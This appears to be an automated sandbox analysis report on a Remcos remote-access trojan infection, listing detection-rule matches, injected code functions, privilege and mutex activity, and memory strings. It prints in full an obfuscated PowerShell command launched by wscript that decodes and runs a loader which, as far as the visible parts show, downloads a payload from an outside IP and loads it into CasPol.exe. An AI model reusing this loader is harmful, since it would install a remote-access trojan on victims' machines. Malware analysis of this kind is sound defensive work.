Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	16_2_004072B5

Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,	12_2_00418267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,	12_2_0041C077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,	12_2_0041C0A3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	14_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004016FD NtdllDefWindowProc_A,	15_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004017B7 NtdllDefWindowProc_A,	15_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402CAC NtdllDefWindowProc_A,	16_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402D66 NtdllDefWindowProc_A,	16_2_00402D66

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0042809D	12_2_0042809D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0045412B	12_2_0045412B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004421C0	12_2_004421C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004281D7	12_2_004281D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043E1E0	12_2_0043E1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041E29B	12_2_0041E29B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004373DA	12_2_004373DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00438380	12_2_00438380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00453472	12_2_00453472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0042747E	12_2_0042747E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043E43D	12_2_0043E43D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004325A1	12_2_004325A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043774C	12_2_0043774C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041F809	12_2_0041F809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004379F6	12_2_004379F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004279F5	12_2_004279F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0044DAD9	12_2_0044DAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00433C73	12_2_00433C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00413CA0	12_2_00413CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00437CBD	12_2_00437CBD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043DD82	12_2_0043DD82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00435F52	12_2_00435F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00437F78	12_2_00437F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043DFB1	12_2_0043DFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_10017194	12_2_10017194
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1000B5C1	12_2_1000B5C1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044A030	14_2_0044A030
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0040612B	14_2_0040612B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0043E13D	14_2_0043E13D
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044B188	14_2_0044B188
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00442273	14_2_00442273
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044D380	14_2_0044D380
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044A5F0	14_2_0044A5F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004125F6	14_2_004125F6
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004065BF	14_2_004065BF
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004086CB	14_2_004086CB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_004066BC	14_2_004066BC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044D760	14_2_0044D760
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00405A40	14_2_00405A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00449A40	14_2_00449A40
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00405AB1	14_2_00405AB1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00405B22	14_2_00405B22
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044ABC0	14_2_0044ABC0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00405BB3	14_2_00405BB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00417C60	14_2_00417C60
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044CC70	14_2_0044CC70
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00418CC9	14_2_00418CC9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044CDFB	14_2_0044CDFB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044CDA0	14_2_0044CDA0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_0044AE20	14_2_0044AE20
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00415E3E	14_2_00415E3E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 14_2_00437F3B	14_2_00437F3B
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00405038	15_2_00405038
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0041208C	15_2_0041208C
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004050A9	15_2_004050A9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0040511A	15_2_0040511A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0043C13A	15_2_0043C13A
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004051AB	15_2_004051AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00449300	15_2_00449300
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0040D322	15_2_0040D322
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0044A4F0	15_2_0044A4F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0043A5AB	15_2_0043A5AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00413631	15_2_00413631
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00446690	15_2_00446690
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0044A730	15_2_0044A730
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004398D8	15_2_004398D8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_004498E0	15_2_004498E0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0044A886	15_2_0044A886
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0043DA09	15_2_0043DA09
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00438D5E	15_2_00438D5E
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00449ED0	15_2_00449ED0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_0041FE83	15_2_0041FE83
Source: C:\Windows\SysWOW64\recover.exe	Code function: 15_2_00430F54	15_2_00430F54
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004050C2	16_2_004050C2
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004014AB	16_2_004014AB
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405133	16_2_00405133
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004051A4	16_2_004051A4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401246	16_2_00401246
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_0040CA46	16_2_0040CA46
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00405235	16_2_00405235
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004032C8	16_2_004032C8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00401689	16_2_00401689
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402F60	16_2_00402F60

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 004351E0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00434ACF appears 43 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401F96 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00401EBF appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: String function: 00402117 appears 40 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 0044DDB0 appears 33 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00418555 appears 34 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004186B6 appears 58 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 004188FE appears 88 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\recover.exe	Code function: String function: 00413025 appears 79 times

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2773
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 2773			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		12_2_00417AD9
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,		16_2_00410DE1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4E8SNN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03

Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: recover.exe, recover.exe, 0000000F.00000002.1391469427.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
